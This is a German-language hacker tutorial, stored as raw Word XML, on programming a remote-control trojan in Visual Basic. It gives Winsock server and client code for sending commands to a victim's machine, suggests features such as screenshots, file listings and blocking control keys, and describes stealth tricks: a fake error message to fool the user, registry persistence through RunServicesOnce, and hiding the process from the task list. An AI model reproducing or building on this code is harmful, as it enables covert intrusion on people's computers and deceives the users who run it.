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u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Wie programmiere ich ein Trojanisches Pferd mit Visual Basic?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808080"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="808080"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>ver1.0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color w:val="808080"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="808080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on Real_Sniper &lt;[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>RealSniper@BrIgHtDaRkNeSs.de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>]&gt;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Dies ist ein BrIgHt_DaRkNeSs-Dokument, welches im Original auf der </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>www.brightdarkness.de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pag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efunden werden kan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de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>I. copyrights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ch stelle es jedem frei diese Dokumentation zu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ervielfaeltigen oder auf Webpages zu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eroefentlich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ch wuerde es aber in einem solchen Fall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gruessen wenigstend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nachrichtet zu werd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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>RealSniper@BrIgHtDaRkNeSs.de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>]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trengstends untersagt ist jedoch ein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odifikation dieses Dokuments ohne di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stimmung des Autors [also MIR!]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ieweit das/die OCX' von Microsoft od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rittfirmen linzensiert sind kann ich nich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ollständig beurteilen; deshalb erwartet nich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on mir, dass ich sie auf meiner Homepag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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>www.brightdarkness.de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>] oder per EMail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zur Verfuegung stelle !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ailen duerft ihr mir jedoch gerne, wenn ih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erbesserungsvorschlaege oder Ergaenzung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abt.[bei Fehlern natuerlich auch; doch es gib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keine *g*]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de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>II. Ziel des Dokumentes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iermit moechte ich allen Leuten beweisen, das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s selbst mit Microsofts Visual Basic moeglich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st eine gefaehrliche Applikation im Stile vo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ack Orifice, Netbus, SubSeven &amp; Co ohne viel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fwand zu programmier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atuerlich besitzt eine solche Applikatio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ewoehnlich weniger Effektivitaet un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efahrenpotential, aber es ist nicht zu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terschaetzen, was man damit anstell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koennte.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de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>III. Inhalt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1. Was ist ueberhaupt ein Trojaner?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2. Wieso soll ich mit Visual Basic einen Trojaner programmieren?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3. Grundlagen und Vorraussetzung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4. Das Winsock OCX: Einstieg in die weite Welt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5. Weiterführende Verbesserung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6. How to make this program stealth....und kompatibel auf anderen PC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7. Conclusio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tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1494" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1494" w:hanging="360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u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>1.</w:t>
        <w:tab/>
        <w:t>Was ist ueberhaupt ein Trojaner?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color w:val="0000FF"/>
          <w:u w:val="single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&lt;&lt;&lt;&lt; Die folgende Passage wurde aus dem Buch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"Hacker's Guide" entnomm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ch kann diese Lektüre nur empfehlen [ISB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3-8272-5460-4]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 Traojanisches Pferd is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) Unautorisierter Code innerhalb eines legitim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rogramms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) Ein legitimes Programm, das durch di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bindung von unautorisiertem Code geänder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urde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) Jedes Programm, das scheinbar erwuenschte un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otwendige Funktionen durchfuehrt, tatsaechlich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ber (aufgrund unautorisiertem Code) Funktion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urchfuehrt, die dem Benutzer nicht bekannt sind.&gt;&gt;&gt;&gt;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color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;&lt;&lt;&lt; Das RFC1244 [zu finden </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>auf http://info.internet.isi.edu:80/in-notes/rfc/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color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>files/1244.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>] beschreibt ein Trojaner auf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olgende Weise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"Ein trojanisches Pferd kann ein Programm sein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s etwas Nuetzliches oder auch nur etwa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nteressantes tut. Es tut immer etwa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erwartetes, wie beispielsweise ohne ihr Wiss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asswoerter stehlen oder Dateien kopieren."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&gt;&gt;&gt;&gt;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 Art von Trojaner, die ich mit diesem Documen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schreiben will, trifft auf c) und die rfc zu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tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1494" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1494" w:hanging="360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u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>2.</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Wieso soll ich </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>mit Visual Basic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> einen Trojaner programmieren?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color w:val="0000FF"/>
          <w:u w:val="single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s ist eine gute Frage, denn VB ist von Haus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s bei weitem nicht so effectiv wie z.B. Visual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 oder vergleichbares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ber man kann auch Visual Basic Dinge anlernen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o dass es fuer unsere Zwecke nutzbar ist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s Programm selbst fuehrt ja kein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rechenintensive Operationen aus. Es ist nur di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chnittstelle zwischen dem Winsock OCX [dazu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paeter mehr] und der Windows API, die di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eisten Ergebnisse liefert. Unser Programm mus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ur getarnt sein, immer zuverlaessig gestarte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erden und die Operationen weiterleiten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Fuer diese Zwecke stellt VB eine einfache und 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chnell zu erstellende IDE zur Verfuegung, mi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er ohne viele Umschweife schnell Forms un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lemente eingefuegt werden koennen. Darueb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inaus findet Visual Basic immer mehr Verbreitun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f der Microsoft Plattform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[C Code waere interessant, wenn jemand solch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ools auf Unix/Linux portieren wolle.....]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tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1494" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1494" w:hanging="360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u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>3.</w:t>
        <w:tab/>
        <w:t>Grundlagen und Vorraussetzung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color w:val="0000FF"/>
          <w:u w:val="single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ls Vorraussetzung benoetigt man Visual Basic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Kenntnisse, die sogar schon ausreichen, wenn ma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ur ein 15-20DM Einsteiger Buch gelesen hat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ch werde NICHT erklaeren wie man ein Formula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fuegt, Einstellungen in einer Datei speicher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oder sonstige basics !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rueber hinaus braucht ihr noch eine Visual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asic Version ab 5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e CCE Version von VB5 oder VB6 reicht auch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s, wenn ihr nur die Funktionsweise d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pplikation euch anschauen wollt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n einer spaeteren Version dieses Dokuments od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auf meiner Homepage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>www.brightdarkness.de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve"> werd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ch eine Funktionsweise erklaeren, wie man mi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er CCE Version doch vollwertige Programme mi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ilfe des WSH erstellen kan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nn benoetigt man noch das mswinsock.ocx, da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ohl mit Visual Basic mitinstalliert wird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tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1494" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1494" w:hanging="360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u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>4.</w:t>
        <w:tab/>
        <w:t>Das Winsock OCX: Einstieg in die weite Welt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color w:val="0000FF"/>
          <w:u w:val="single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it Hilfe des MSWinsock OCX kann man eine TCP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oder UDP Verbindungen zu einem entfernten Rechn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fbau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an benoetigt dessen IP Nummer und einen offenen Port, der auf die Anfrage antworten kan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s wird man sich spaeter benutzen, um ein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erbindung zwischen dem "Angreifer"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["Fernverwalter" oder wie immer man es nenn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ill und welche Absichten er hat] und d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"Opfer" herzustell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f dem Opferrechner laeuft die Serverapplikatio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es Trojaners, der auf eine Anfrage ueber da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etzwerk/Internet an einem bestimmten Por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artet. Deshalb ist es anfangs sinnvoll ein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estgelegten Port zu waehl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o erspart man das scannen an allen Ports und ma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uss nicht auf alle Ports anfragen schicken, wa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ffaellig sein kan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un kommen wir zu einer entscheidenden Frage: Wird das Tool nur im lokalen Netzwerk genutz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oder soll es ueber das Internet nutzbar sein?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 Nutzung ueber das Internet schraenkt z.B. d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iletransfer ein[allein schonaufgrund d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eringen Geschwindigkeit]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für ist dieses Tool unter der kompletten Win32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PI einsetzbar: d.h. Win9x, WinNT, Win2000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ehen wir zuerst einmal davon aus, dass auf ein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kannter Rechner [d.h. IP ist vorhanden] di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erverapplikation laeuft. Im folgenden beschreib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ch die einzelnen Application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a) Server [--&gt;"Opfer"] Applikation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--------------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n beide Applikationen muss natuerlich ein  Winsock OCX eingefuegt werd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 Winsock OCX muss im Project auf TCP Protokoll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estellt werden!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(Anmerkung: ich nenne das Winsock OCX "tcp")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aehrend dem "Load" Ereignis muss die Winsock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atuerlich auf 'Empfang' gestellt werden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tcp.List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er Opferrechner wartet somit auf Connectio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eber das TCP/IP Protokoll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 Ports [tcp.LocalPort und auch tcp.RemotePort]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ollten am Besten auf feste Werte gesetzt werd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 beiden muessen sich aber unterscheid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m besten nimmt man 2 aufeinanderfolgende ports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nach muss man die Prozedur erstellen, die ein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erbindung annimmt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Private Sub tcp_ConnectionRequest(ByVal requestID As Long)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ab/>
        <w:t>If tcp.State &lt;&gt; sckClosed Then tcp.Clos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ab/>
        <w:t>tcp.Accept requestI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End Sub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er Rechner akzeptiert dann eine Anfrage auf d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estgelegten Port und verbindet mit dem Clien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d dessen IP]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enn dieser Vorgang erfolgt ist, stehen ein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lle Tore offen. Man kann nun Daten an d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ntfernten Rechner verschick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s geschieht ueber den "send" Befehl. Ich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mpfehle aber anfangs nur Strings ueber ein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olche Verbindung zu jagen, da man sonst ein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llunterscheidung machen muss, auf die ich hi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jedoch nicht eingehen werde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sp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cp.senddata "opencdrom" wird im Clien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fgerufen, und der (Opfer-)Server empfängt p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".getdata" den String "opencdrom"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nn kann er auf den Empfang des Befehls hi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sen ausführen, indem er dem Betriebssystem d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assenden Befehl zum Öfnnen des CDRom schickt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m zu unterscheiden, welcher Befehl vom Angreif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esendet wurde mach man eine Fallunterscheidun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im Eingang des IP-Packetes mit dem Befehl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Private Sub tcp_DataArrival(ByVal bytesTotal A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Long)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Dim msg As Strin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tcp.GetData ms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un hat man in der Variabel "msg" den Inhalt de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fehls, der übermittelt wurde (z.B."opencdrom")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it einer gezielten Fallunterscheidung lässt sich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nn der gesendete Befehl identifizieren un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sführen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Select Case ms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 xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Case "cdopen"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 xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>Call mciExecute("Set CDaudio doo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i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t>open")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t>'muss vorher definiert werden!!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............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i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>End Selec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n "........" kann man eigentlich so viel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nwendungsmöglichkeiten reinstecken wie man will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(und auch nützlich findet)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Beispiele für Funktionen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>, die implementier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erden sollten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 xml:space="preserve">- Benachrichtigung, wenn der Computer neu </w:t>
        <w:tab/>
        <w:t>gestartet oder ausgeschaltet wird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- Ping-Funktio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- CDRom öffnen/schliess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- Username übermittel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- sonstige Systeminfo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- Kontrolltasten blockieren (Wintaste; crt-alt-</w:t>
        <w:tab/>
        <w:t>enf)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- Dateilisten/Verzeichnisstrukturen übertrag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 xml:space="preserve">- Mousespielereien (Sichtbarkeit, </w:t>
        <w:tab/>
        <w:t>Positionierung, Doppelklicks...)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- Screenshots nehmen und übermittel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- Windows beenden o.ä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- Messageboxen anzeig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- .........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se VB-Routinen findet man in jeder offiziell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tabase; ein Blick in jede Suchmaschine lohn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ich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[Wenn man eine Serverapplikation in einer ander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rogrammiersprache entwickelt (z.B. C), dann is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er Trojaner sogar plattformübergreifend!!]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b) Client [--&gt;"Angreifer"] Applikation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---------------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se Applikation bietet das Steuerelement fü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en Angreifer. Sie kann grafisch aufwendi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rogrammiert werden, denn sie soll ja auch wa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ieten *g*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ier vereinen wir alle Schaltflächen, um di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anzen vorhandenen Funktionen einfach zugänglich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achen. Ich möchte keine Diskussionen anfechten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ob Dropdownlisten besser geeignet wären al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zelne Buttons.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Zum Technischen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ier gibt es wohl nicht so viel. Der meiste Cod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m Client sind wohl Gimmicks, die das Prog bess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ssehen lassen sollen und funktioneller machen.(Always on top, Faden, Mouse over Effekte......)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er Server muss natürlich auch Connection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mpfangen können, um den Status des "Opfer"-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Rechners zu empfangen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Private Sub tcp_ConnectionRequest(ByVal requestID As Long)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If tcp.State &lt;&gt; sckClosed Then tcp.Clos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tcp.Accept requestI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End Sub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nn muss man die IP des Opfers natürlich hab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(oder sich einen IP-Scanner programmieren *g*)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d dem Programm mi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i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>tcp.RemoteHost=input.text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:tab/>
        <w:t>//IP-Nummer des Opfer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itteil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nach kann man mit dem Remote Rechner Kontak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f den vorher festgelegten Ports aufnehmen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tcp.Connec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oweit das Formelle....nun kann  man eigentlich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chon beginnen Strings über die (hoffentlich)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stehende Leitung zu senden. Dies passiert dan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i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">send "opencdrom" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>, wenn man den Opferrechn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ffordern will das CDRom zu öffnen. Kling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ogisch, oder?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enk dran, dass man nur Kommandos senden sollte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 der eigene Server auf Opferseite auch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ersteht und ausführen kann !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er Client ist die wenigste Programmierarbeit bei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er Trojanergeschicht, weil er nur die Befehl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enden muss. Der Server aber muss sie versteh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d ausführen. Und er muss darüber hinaus noch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i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t xml:space="preserve">stealth </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>sei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tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1494" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1494" w:hanging="360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u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>5.</w:t>
        <w:tab/>
        <w:t>Weiterführende Verbesserungen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color w:val="0000FF"/>
          <w:u w:val="single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s erste, was wohl noch zu tun ist, wäre d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Zugriff auf Konfigurationsfiles, in denen all di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nfos gespeichert werden sollten, die das Proggi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icht wieder vergessen soll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e weitere Verbesserung dieses Progamms würd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ohl einen IP Scanner sein, der automatisch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gewisse IP Bereiche [ich denke da eher an ein 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okales Netzwerk als an das Internet] automatisch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ach Serverapplikationen scannt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ielleicht werde ich mich noch diesem Thema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idm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tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1494" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1494" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF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u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>6.</w:t>
        <w:tab/>
        <w:t>How to make this program stealth....und kompatibel auf anderen PC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b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF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u w:val="single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 grosser Minuspunkt bei selbst geschrieben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rojanern ist die Tatsache, dass sie irgendwo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estartet werden müss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ür diese Zwecke ist der Gebrauch des Windows-Autostartordners tabu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 Programm, dass stealth laufen soll, ist i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sem Ordner fehl am Platze. Dies ist nämlich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er erste Platz an dem komtrolliert wird:-(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enau das gleiche ist es mit dem Versuch, d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rogrammaufruf in der Registry im Schlüssel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"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\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indows\CurrentVersion\Run" einzurichten. Dies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ositionen sind heutzutage sogar fast jed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ewbie bekannt und werden auch vo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ools wie "msconfig" überprüft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Eine Möglichkeit, die ich bisher noch nie gesehen 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abe ist die Eintragung in "HKEY_LOCAL_MACHIN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\SOFTWARE\Microsoft\Windows\CurrentVersio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\RunServicesOnce". Dies bewirkt einen einmalig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fruf des Programms beim nächsten Windowsstart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i dem sich das Programm erneut in die Registry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tragen kann (passende Prozedur wählen)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e Massnahme die man immer treffen kann, di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ber nur die 'form' unsichtbar macht ist d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fruf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frmPeerB.Visible = Fals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fach aber effektiv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m das Programm etwas unauffälliger zu mach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kann man folgende Zeilen in den Programmcod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fügen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Text1.Text = Comman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If Text1.Text &lt;&gt; "/load" Th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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>msg = MsgBox("Exception Error:00x169f !", vbCritical, "Memory error!")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End If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s bewirkt, dass das Programm eine InfoBox mi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em Inhalt "Exception Error:00x169f !" auf d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ildschirm gezaubert wird, wenn das Program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icht mit dem Parameter "/load" gestartet wird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zu stellen wir uns folgendes vor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 User läd das Tool, das wir al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underallheilmittel angepriesen haben aus de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etz und führt es auf seinem PC aus. Er bekomm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e Nachricht auf den Bildschirm gezaubert, di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sagt, dass ein Ausnahmefehler auftrat[weil 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icht den "/load"-Parameter nutzte] und da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rogramm wird beendet. Er wird es vielleich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öschen, weil es nicht funktioniert; was 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jedoch nicht weis ist, das sich das Program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chon längst in einen Systemordner kopiert [egal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ob \Programme oder \windows\system] und in di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Registry zum Start eingetrag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f diese Weise wird ein unscheinbares Äussere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epflegt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ch diesem Sinne folgt folgender Code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If App.PrevInstance Th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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>mag = MsgBox("Driver already loaded.", vbOKOnly, "loading")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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>En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End If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r bewirkt, dass das Programm die Meldung "Driv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lready loaded." ausgibt, wenn das Programm aktiv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st und erneut gestartet wird. Dies tritt zum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ispiel ein, wenn der User nicht locker läss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d sich mit dem "Exception Error:00x169f !"nicht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zufrieden gibt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s wichtigste an der ganzen Versteckgeschicht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st folgendes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ir deklarieren den Prozess unseres Programms al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en Service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s bewirkt, dass das Programm aus der TasksListe entfernt wird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mit wird es eigentlich unsichtbar. Falls jemand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s Programm auf andere Weise entdecken kann so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öge er es mir mailen ;-)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[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>realsniper@brightdarkness.de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>]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eklarationsteil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Public Declare Function RegisterServiceProces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Lib "kernel32.dll" (ByVal dwProcessId As Long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ByVal dwType As Long) As Lon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Public Declare Function GetCurrentProcessId Lib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"kernel32.dll" () As Lon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fruf im Hauptprogramm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a = RegisterServiceProcess(GetCurrentProcessId,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1)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</w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="708"/>
          <w:tab w:val="left" w:pos="1494" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1494" w:hanging="360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b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>7.</w:t>
        <w:tab/>
        <w:t>Conclusion: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color w:val="0000FF"/>
          <w:u w:val="single"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0000FF"/>
          <w:u w:val="single"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s wars eigentlich schon. So einfach geht das!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lls es Anregungen und Verbesserungsvorschläg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ür diese Prinzipien gibt wäre ich dankbar, wen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diese mich unter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>realsniper@brightdarkness.de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rreichen würden...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d denkt daran: Dies ist nur eine Erläuterung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d ein simples Beispiel dafür, dass auch unt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isualBasic gefährliche Programme geschrieben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erden können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ch persönlich finde die Lamer, die nur nach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rojanern scannen können und sich die Exploits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s dem Netz luden sind das Letzte !!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lso tut was selbst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  <w:t>Keep it real..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/>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="de-DE"/>
        </w:rPr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Real_Sniper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b/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="de-DE"/>
        </w:rPr>
        <w:t>www.brightdarknes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